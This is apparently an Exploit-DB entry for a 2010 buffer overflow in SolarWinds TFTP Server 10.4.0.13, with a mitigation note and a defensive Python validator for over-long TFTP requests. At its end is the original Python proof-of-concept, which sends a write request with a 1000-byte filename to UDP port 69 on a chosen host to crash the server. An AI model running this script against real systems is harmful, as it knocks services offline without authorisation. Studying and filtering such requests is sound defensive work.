Vendor: TFTP Server
By: Elliott "Nullthreat" Cutright
CVSS: 8.8 (HIGH)
Vulnerability: Buffer Overflow
CWE: 120
Product Name: TFTP Server
Affected Version From: 10.4.0.13
Affected Version To: 10.4.0.13
Patch Exists: YES
CPE: a:solarwinds:tftp_server
Platforms Tested: Windows XP SP3
2010

Solarwinds TFTP Server Ver. 10.4.0.13

A long Write Request (1000 A's) will cause SolarWinds TFTP Server to crash.

Mitigation:

Upgrade to the latest version of SolarWinds TFTP Server
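
A defensive check for the request described above, as an added example that is not part of the original entry or the vendor's code: it parses a TFTP read/write request (opcode, NUL-terminated filename, NUL-terminated mode) and rejects over-long filenames before they reach a server. The 255-byte limit, the function name and the sample datagrams are assumptions constructed for illustration.

```python
import struct

MAX_FILENAME = 255  # assumed policy limit; RFC 1350 defines no maximum
OPCODES = {1: "RRQ", 2: "WRQ"}
MODES = {b"netascii", b"octet", b"mail"}


def inspect_tftp_request(datagram, max_filename=MAX_FILENAME):
    """Return (verdict, detail); verdict is 'ok', 'ignore' or 'reject'."""
    if len(datagram) < 4:
        return "reject", "too short for opcode plus two strings"
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in OPCODES:
        return "ignore", "opcode %d is not RRQ/WRQ" % opcode
    kind, body = OPCODES[opcode], datagram[2:]
    name_end = body.find(b"\x00")
    if name_end == -1:
        return "reject", kind + ": filename not NUL-terminated"
    filename = body[:name_end]
    if not filename:
        return "reject", kind + ": empty filename"
    if len(filename) > max_filename:
        return "reject", "%s: filename is %d bytes (limit %d)" % (
            kind, len(filename), max_filename)
    # Mode follows the filename; RFC 2347 options after it are not inspected.
    rest = body[name_end + 1:]
    mode_end = rest.find(b"\x00")
    if mode_end == -1:
        return "reject", kind + ": mode not NUL-terminated"
    mode = rest[:mode_end].lower()  # mode strings are case-insensitive
    if mode not in MODES:
        return "reject", "%s: unknown mode %r" % (kind, mode)
    return "ok", "%s %s (%s)" % (
        kind, filename.decode("ascii", "replace"), mode.decode("ascii"))


# Constructed sample datagrams (not captured traffic).
SAMPLES = {
    "normal WRQ": b"\x00\x02config.bin\x00octet\x00",
    "oversized WRQ": b"\x00\x02" + b"A" * 1000 + b"\x00NETASCII\x00",
    "unterminated WRQ": b"\x00\x02" + b"A" * 40,
    "DATA block": b"\x00\x03\x00\x01payload",
}

if __name__ == "__main__":
    for label, pkt in SAMPLES.items():
        print("%-17s %s: %s" % ((label,) + inspect_tftp_request(pkt)))
```

The same length test can be expressed as a size threshold on UDP port 69 request packets in an IDS or filtering proxy placed in front of a server that cannot be upgraded immediately.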

Exploit-DB raw data:

#!/usr/bin/python
print "\n############################################################"
print "##	Nullthreat Network"
print "##	Solarwinds TFTP Server Ver. 10.4.0.13"
print "##	Elliott \"Nullthreat\" Cutright"
print "##	nullthreat@nullthreat.net"
print "############################################################"
print "\n"
# Summary: A long Write Request (1000 A's) will cause SolarWinds TFTP Server to crash.
# Tested on: Windows XP SP3
# Usage: ./solarwindscrash.py <IPADDRESS>
# Note: It can take the application a few moments to crash, be patient.
# Shouts: #SEUnited, Corelan Team

# Discovered: June 6th 2010
# Vendor Notified: June 9th 2010
# Patch Released: June 11th 2010

import socket
import sys

host = sys.argv[1]
port = 69
addr = (host,port)

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

print "[*] Building Crash"
crash = "\x41" * 1000
request = "\x00\x02" + crash + "\x00" + "NETASCII" + "\x00"

print "[*] Sending Crash"
s.sendto(request, addr)

print "[*] Crash Sent, It can take some time for the app to crash"